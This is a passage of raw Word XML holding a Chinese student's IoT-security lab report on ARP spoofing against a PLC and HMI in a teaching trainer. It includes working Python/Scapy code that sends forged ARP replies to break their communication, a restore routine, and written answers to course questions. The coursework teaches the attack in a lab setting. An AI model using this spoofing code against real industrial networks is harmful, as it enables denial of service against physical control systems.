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DE705">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C0B65F2">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>物联网安全课程实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047653FC"/>
    <w:p w14:paraId="4288E5DF"/>
    <w:p w14:paraId="009B9526">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>四</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452CBF21"/>
    <w:p w14:paraId="6E99D04E"/>
    <w:p w14:paraId="32880024"/>
    <w:p w14:paraId="374317C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1902460</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>66675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1508125" cy="15081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167" cy="150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C4CCA"/>
    <w:p w14:paraId="5F7373A4"/>
    <w:p w14:paraId="050E995E"/>
    <w:p w14:paraId="5368FA13"/>
    <w:p w14:paraId="477E07BF"/>
    <w:p w14:paraId="0A26551F"/>
    <w:p w14:paraId="33B61574"/>
    <w:p w14:paraId="230E6A60"/>
    <w:p w14:paraId="3EDBCBEA"/>
    <w:p w14:paraId="2986E0C0"/>
    <w:p w14:paraId="74B4DA70"/>
    <w:p w14:paraId="2E0949EC"/>
    <w:p w14:paraId="1BA27509"/>
    <w:p w14:paraId="148875BD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实验名称：_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>___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ARP欺骗攻击实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>______</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25345852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姓名：_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_____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赵悦蛟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>____________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F68BDD2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小组：_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_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 xml:space="preserve">赵悦蛟 李宛纹 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_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廖雅涵</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C6F1CA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学号：_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>____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2313650</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F90FB31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专业：_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>______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物联网安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_______</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC64E9">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/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提交日期：_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2025.11.29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F08D3F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="746DC733">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC35449">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、实验目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F94BD6">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>理解ARP协议及ARP攻击基本原理，学习Python下的网络编程库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179E8C9D">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Scapy的基本使用，并在实验环境中实现ARP攻击，理解保障系统安全的复杂性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D6F9CA">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、实验要求及要点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403AFF4D">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分组（1-3人）完成实验内容，单独撰写实验报告，回答问题，且报告内容至少包括如下要点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF70AD1">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4BC268">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1）为什么攻击后需要复原现场？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7F6206">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2）本实验的攻击效果与实验二中指令攻击的攻击效果有何异同？为什么？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78738A73">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3）本实验中的ARP欺骗攻击对实验三中受到加密保护的系统是否有效？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C568E17">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为什么？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA7A360">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4）简要探讨ARP攻击防范措施</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12235693">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三、实验内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BC6D6A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实验工具：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369A9E59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编程库：Scapy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Scapy 是一款强大的 Python 网络编程库，支持数据包的构造、发送、捕获与解析，可灵活操作 TCP/IP 协议栈各层数据。本实验中，通过其</w:t>
      </w:r>
      <w:r>
        <w:t>sr1()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>函数发送 ARP 请求获取设备 MAC 地址，利用ARP()类构造欺骗包与恢复包，再通过send()函数下发数据包，实现 ARP 欺骗攻击与网络恢复的核心逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0986AC6F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</w:rPr>
        <w:t>开发工具：PyCharmPyCharm 是常用的 Python 集</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>成开发环境（IDE），提供代码编辑、语法检查、运行调试等功能。实验中通过 PyCharm 配置虚拟环境（如.venv），管理 Scapy 等依赖库，同时实时查看代码运行日志（如欺骗包发送计数、恢复包进度），提升实验操作效率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7368F8E7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default"/>
        </w:rPr>
        <w:t>实验硬件：工控试验箱包含 PLC（可编程逻辑控制器，IP：192.168.1.3）与 HMI（人机交互界面，IP：192.168.1.4），模拟工业场景中的设备通信。实验通过攻击两者的 ARP 映射，验证攻击对工业控制系统的影响，是观察攻击效果与恢复结果的实体载体。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBB6426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2BC31A30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编写代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AAAA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scapy.all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</w:p>
    <w:p w14:paraId="0840D7E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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670F5CC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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2615FAC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threading  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导入线程模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E5B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scapy.layers.l2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ARP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107ED5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</w:p>
    <w:p w14:paraId="78E2EBF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get_mac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290FDB9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"""获取指定IP的MAC地址"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105488E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f"正在获取 {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} 的MAC地址..."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6D6039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使用 sr1 发送 ARP 请求并等待响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC1FCA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response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sr1(ARP(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ip),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5988F6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response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34084A3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response.hwsrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D2ED0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278E121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f"无法获取 {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ip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} 的MAC地址"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E9D958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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C8E3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40" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E18EA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--- 新增的攻击执行函数 ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2324A3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perform_attack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plc_ip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hmi_ip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hmi_mac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stop_event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17D0067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"""在一个独立的线程中执行持续的ARP欺骗攻击"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D91C58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1F847A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fake_mac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"ee:ee:ee:ee:ee:ee"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32245EC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count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407E1E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=== 开始ARP欺骗攻击 (在后台线程中运行) ==="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DCE19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"攻击原理: 告诉HMI，PLC的MAC地址改变了"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94189E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"等待用户按下 Enter 或 Ctrl+C 停止攻击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AA7960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3455A07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stop_event.is_set():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4021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构造并发送ARP欺骗包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA6C3D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atk_packet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ARP(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7146599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E82A9D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plc_ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01153B5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hwsrc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fake_mac,  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欺骗的MAC地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BB0C5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hmi_ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5469C82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hwdst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hmi_mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D74A7B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4A33FD9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send(atk_packet,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61AFA6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count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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070751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0CE8DD2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优化显示，不需要 sys.stdout.flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9092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\r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已发送欺骗包: {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6D1E36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3642907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使用 wait() 代替 sleep()，这样如果事件被设置，它会立即返回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431B68B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    stop_event.wait(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每 2 秒检查一次停止信号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E27D6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40" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CB411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arp_attack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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AA494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"""执行ARP欺骗攻击的主函数"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B4FAB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实验环境IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26079F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plc_ip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"192.168.1.3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104516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hmi_ip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"192.168.1.4"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063D481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2FB0A90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停止信号量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043EA33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stop_event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threading.Event()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52415D1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3A478E6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"=== ARP欺骗攻击实验 ===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53397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60C1CD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获取MAC地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501674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plc_mac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get_mac(plc_ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056214A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hmi_mac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get_mac(hmi_ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD950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5151223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plc_mac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hmi_mac:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528C149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"获取MAC地址失败，请检查网络连接!"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9A20A7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return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3008992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1227118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获取成功:"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166F4C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f"PLC: {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plc_ip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} -&gt; {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plc_mac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52E534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f"HMI: {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hmi_ip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} -&gt; {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hmi_mac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}"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5DE749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7194AFF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启动攻击线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0888808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attack_thread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threading.Thread(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8F1BE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perform_attack,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DE15D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(plc_ip, hmi_ip, hmi_mac, stop_event)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F26051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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A159A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attack_thread.daemon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设置为守护线程，确保主程序退出时它也会退出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238617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attack_thread.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BE5AE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267D49D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主线程负责等待用户输入来停止攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4E426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02732D0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按 Enter 停止攻击..."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07A319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用户停止攻击..."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C06594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85E73"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="FFFFFF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0CC32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Ctrl+C 停止攻击..."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11B419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5657E9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发出停止信号并等待攻击线程结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EFC2D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stop_event.set()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0747382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attack_thread.join(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最多等待 3 秒，防止卡死</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA9EF7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7F07100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--- 网络恢复阶段 ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE6DE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=== 恢复网络 ==="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1B5BDB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5B0A835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循环 10 次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0DCDC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resume_packet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ARP(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F3E0C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C78408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plc_ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D40F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hwsrc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plc_mac,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="515151"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 真实的MAC地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447AEF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hmi_ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CABF54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hwdst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hmi_mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16441C9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    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED57C7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send(resume_packet,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verbose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8508B2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f"发送恢复包 {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}/10"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078ABC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    time.sleep(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="096D4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F1FAA7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66B5A48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E2CBC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"✓ 网络恢复完成!"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9520C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40" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534141C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5200D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F4A85"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112A302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92929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14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>    arp_attack()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9E8DC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 w14:paraId="450A1815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代码</w:t>
      </w:r>
      <w:r>
        <w:t>包含了 MAC 地址获取、攻击执行和网络恢复三个核心环节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B75B9">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先，代码通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>get_mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数获取 PLC（192.168.1.3）和 HMI（192.168.1.4）的 MAC 地址，利用 Scapy 的sr1函数发送 ARP 请求并等待响应，若超时未收到响应则提示获取失败，为后续攻击和恢复提供必要的网络信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F83F66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在攻击执行环节，代码采用多线程设计，将攻击逻辑封装在perform_attack函数中并作为独立线程运行。该函数通过构造 ARP 响应包（op=2表示 “is-at” 响应），以 PLC 的 IP 为源 IP（psrc），但替换为伪造的 MAC 地址（hwsrc="ee:ee:ee:ee:ee:ee"），持续向 HMI 发送，使 HMI 的 ARP 缓存中 PLC 的 IP 与 MAC 映射被篡改，导致两者通信中断。攻击过程中，通过stop_event事件控制循环终止，每 2 秒发送一次欺骗包并实时显示发送计数，既保证攻击持续性，又便于用户观察进度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EB50E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主线程则专注于用户交互，通过input等待用户按下 Enter 或捕获Ctrl+C信号，收到停止指令后，通过stop_event通知攻击线程终止，并等待线程结束。随后进入网络恢复阶段，代码循环 10 次发送包含 PLC 真实 IP 与 MAC 映射的 ARP 包，强制刷新 HMI 的 ARP 缓存，确保网络恢复正常通信，避免攻击后系统长期异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3416954D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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实际效果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1C6C88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101340"/>
            <wp:effectExtent l="0" t="0" r="5080" b="10160"/>
            <wp:docPr id="1" name="图片 1" descr="cea44bd6b676c12e33c7ac8673e2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ea44bd6b676c12e33c7ac8673e28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6569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134360"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="2" name="图片 2" descr="d2d2e794ddf32b3c6ebdd502bb6cb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d2e794ddf32b3c6ebdd502bb6cb3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A1C0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954145"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8255"/>
            <wp:docPr id="4" name="图片 4" descr="88099ef3d7f3ba0d7da6ceb9940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8099ef3d7f3ba0d7da6ceb9940447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DDA1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>攻击启动后，界面上控制功能无法响应操作 —— 点击 “启动”“停止” 按钮后，PLC 无对应动作反馈，无法通过 HMI 进行参数调整或状态切换，实现了拒绝服务的攻击效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760FE984">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>按下 Enter 停止攻击后，代码自动发送 10 次恢复包，强制刷新 HMI 的 ARP 缓存。恢复完成后，HMI 界面重新显示与 PLC 的正常连接，“启动”“停止” 等控制指令可正常下发，跑马灯、交通灯模块恢复响应，液体混合、汽车装配等模拟场景能按操作流程运行，系统恢复至攻击前的正常工作状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3282F4DE">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四、回答问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A308A06">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>1）为什么攻击后需要复原现场？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D76AF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攻击后复原现场能让系统恢复正常通信，还原攻击对实验箱造成的破坏。保护实验箱是进行实验时的责任，确保后续实验能在正常环境中开展，避免因本次攻击导致设备长期异常或影响其他实验操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C554DA4">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>2）本实验的攻击效果与实验二中指令攻击的攻击效果有何异同？为什么？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1F7C36">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>相同点：两者均为网络安全攻击手段，通过伪造或修改数据包干扰 HMI 与 PLC 的正常通讯，属于恶意攻击行为，且都要求攻击者具备一定技术能力和对目标系统的了解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08989906">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不同点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85E021">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>攻击对象与原理：ARP 欺骗攻击针对局域网通信，通过伪造 ARP 响应欺骗设备的 ARP 表，使 IP 与 MAC 地址映射错误，导致 HMI 与 PLC 无法正常通信；指令攻击针对系统或应用程序漏洞，通过发送恶意指令（假冒 HMI 身份）改变 PLC 控制指令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FACF6">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
